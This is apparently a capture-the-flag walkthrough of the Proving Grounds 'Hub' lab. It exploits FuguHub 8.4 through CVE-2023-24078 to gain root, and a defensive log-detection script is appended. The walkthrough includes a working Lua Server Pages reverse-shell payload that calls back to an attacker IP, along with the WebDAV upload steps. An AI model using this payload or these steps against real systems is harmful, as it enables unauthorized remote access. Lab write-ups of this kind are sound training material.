In this walkthrough, we will be going through the Hub room from Proving Grounds. This room is rated as Easy on the platform and involves exploiting FuguHub CMS using CVE-2023-24078, which eventually gives us root on the target. So, let’s get started without any delay.
Machine Info:
| Title | Hub |
| --- | --- |
| IP address | 192.168.171.25 |
| Difficulty | Easy |
| OS | Linux |
| Description | Hub is an Easy rated Linux machine that is running FuguHub CMS, which is vulnerable to CVE-2023-24078, an RCE vulnerability. |
Enumeration:
- I started off with my regular aggressive nmap scan and found 4 open ports – 22 (SSH), 80, 8082, 9999 (HTTP).
```
$ sudo nmap -A 192.168.171.25
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-28 22:48 IST
Nmap scan report for 192.168.171.25
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.4p1:
|     PRION:CVE-2016-20012  5.0  https://vulners.com/prion/PRION:CVE-2016-20012
|     PRION:CVE-2021-28041  4.6  https://vulners.com/prion/PRION:CVE-2021-28041
|     CVE-2021-28041  4.6  https://vulners.com/cve/CVE-2021-28041
|     CVE-2021-41617  4.4  https://vulners.com/cve/CVE-2021-41617
|     PRION:CVE-2020-14145  4.3  https://vulners.com/prion/PRION:CVE-2020-14145
|     CVE-2020-14145  4.3  https://vulners.com/cve/CVE-2020-14145
|     CVE-2016-20012  4.3  https://vulners.com/cve/CVE-2016-20012
|     PRION:CVE-2021-41617  3.5  https://vulners.com/prion/PRION:CVE-2021-41617
|     PRION:CVE-2021-36368  2.6  https://vulners.com/prion/PRION:CVE-2021-36368
|_    CVE-2021-36368  2.6  https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open     http     Barracuda Embedded Web Server
| http-methods:
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan:
|   Server Date: Sun, 28 Jan 2024 17:19:16 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
9999/tcp open     ssl/http Barracuda Embedded Web Server
| http-methods:
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan:
|   Server Date: Sun, 28 Jan 2024 17:19:17 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after:  2074-04-18T19:15:09
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/28%OT=22%CT=1%CU=39491%PV=Y%DS=4%DC=T%G=Y%TM=65B68C9
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=86
OS:60%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   202.12 ms 192.168.45.1
2   202.09 ms 192.168.45.254
3   202.91 ms 192.168.251.1
4   202.93 ms 192.168.171.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.66 seconds
```
- Enumerated the web server on port 80, which returned a 403 Forbidden error.
- Next, enumerated the web server on port 8082. It reveals an application running on it. As per the nmap results, it is running “Barracuda Embedded Web Server”.
- Looked around the application and found a page where I could set up an Administrator account. So, I created one with the below information.
email - [email protected]
Admin username - admin
Password - password
- Next, I used the created account information to log in to the CMS. Configured it with default settings and clicked save.
admin: password
- Now, I was able to access a Web File Server. At this point, I wasn’t sure what to do next. So, I fired gobuster on the target to reveal any juicy directories.
gobuster dir -u http://192.168.171.25/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
- Enumerating around the application revealed a License page where the application version was highlighted – FuguHub 8.4.
CVE-2023-24078
- Looked for any known exploits related to the concerned version and found that the target version is vulnerable to CVE-2023-24078, which is an RCE vulnerability.
- Copied the exploit to my current working directory using searchsploit.
searchsploit FuguHub
searchsploit -m multiple/webapps/51550.py
Exploitation & Getting root:
- The exploit takes a listening IP and port for the reverse shell along with the target host and port as input. Once the execution is completed, it should get a shell back on my listener, but it didn’t.
python3 51550.py -l 192.168.45.182 -p 4444 -r 192.168.171.25 -rp 8082
- So, I performed the exploitation manually. I went to the target location and copied the WebDAV session URL.
http://192.168.171.25:8082/fs/
http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/
- Prepared the below Lua script that will be used as our payload.
```
<div style="margin-left:auto;margin-right: auto;width: 350px;">
  <div id="info">
    <h2>Lua Server Pages Reverse Shell</h2>
    <p>Delightful, isn't it?</p>
  </div>
  <?lsp if request:method() == "GET" then ?>
    <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.182/4444 0>&1'") ?>
  <?lsp else ?>
    You sent a <?lsp=request:method()?> request
  <?lsp end ?>
</div>
```
- Next, accessed the WebDAV share using cadaver and uploaded our Lua script to it.
```
$ cadaver
dav:!> open http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/
dav:/fs/0dae0a33426ff7bf48d68b67/> cd ..
Authentication required for Web File Server on server `192.168.171.25':
Username: admin
Password:
dav:/fs/> put rev.lsp
Uploading rev.lsp to `/fs/rev.lsp':
Progress: [=============================>] 100.0% of 364 bytes succeeded.
dav:/fs/>
```
- We can then execute our shell by visiting the below URL, giving us a shell as user root.
http://192.168.171.25:8082/rev.lsp
- Finally, captured the root flag and completed the machine.
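For defenders, the upload-then-request sequence above leaves a recognisable trace in web logs. The following detection sketch is an added example, not part of the original walkthrough or the FuguHub project: it correlates a successful WebDAV PUT of an `.lsp` file with a later request for the same file name. The Combined Log Format input, the sample lines and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta
from posixpath import basename

# Constructed sample in Combined Log Format (assumed, e.g. from a reverse proxy
# in front of the file server). Client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - admin [28/Jan/2024:17:40:01 +0000] "PROPFIND /fs/ HTTP/1.1" 207 1243
203.0.113.7 - admin [28/Jan/2024:17:40:09 +0000] "PUT /fs/rev.lsp HTTP/1.1" 201 0
198.51.100.4 - - [28/Jan/2024:17:40:30 +0000] "GET /index.lsp HTTP/1.1" 200 5120
203.0.113.7 - - [28/Jan/2024:17:41:02 +0000] "GET /rev.lsp HTTP/1.1" 200 312
203.0.113.9 - bob [28/Jan/2024:17:45:00 +0000] "PUT /fs/report.pdf HTTP/1.1" 201 0
"""

LINE = re.compile(r'(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def parse(line):
    """Return one log line as a dict, or None if it does not match the format."""
    m = LINE.match(line)
    if not m:
        return None
    ip, user, ts, method, path, status = m.groups()
    return {"ip": ip, "user": user, "method": method, "status": int(status),
            "path": path.split("?", 1)[0],
            "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")}

def find_upload_then_execute(log_text, window=timedelta(minutes=30)):
    """Flag .lsp files that were PUT successfully and then requested within window."""
    uploads, alerts = {}, []
    for ev in filter(None, map(parse, log_text.splitlines())):
        if not ev["path"].lower().endswith(".lsp"):
            continue
        name = basename(ev["path"])
        if ev["method"] == "PUT" and 200 <= ev["status"] < 300:
            uploads[name] = ev          # remember the most recent upload
        elif ev["method"] in ("GET", "POST") and name in uploads:
            up = uploads[name]
            if ev["time"] - up["time"] <= window:
                alerts.append({"file": name, "uploaded_by": up["user"],
                               "upload_ip": up["ip"], "uploaded_to": up["path"],
                               "requested_as": ev["path"], "request_ip": ev["ip"]})
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_execute(SAMPLE_LOG):
        print(alert)
```

Files renamed with MOVE or COPY carry the new name in the `Destination` header, which access logs do not record, so this check covers direct PUT uploads only.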
Conclusion:
So that was “Hub” for you. We started off with a regular nmap scan and found 4 open ports – 22 (SSH), 80, 8082, 9999 (HTTP). Enumerated the web server on port 8082, which revealed “Barracuda Embedded Web Server” running on it. Created an admin account and got access to the backend, which revealed the version, FuguHub 8.4. Looked online for any known exploit and found that it is vulnerable to CVE-2023-24078. Used the same to exploit and get root on the target. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.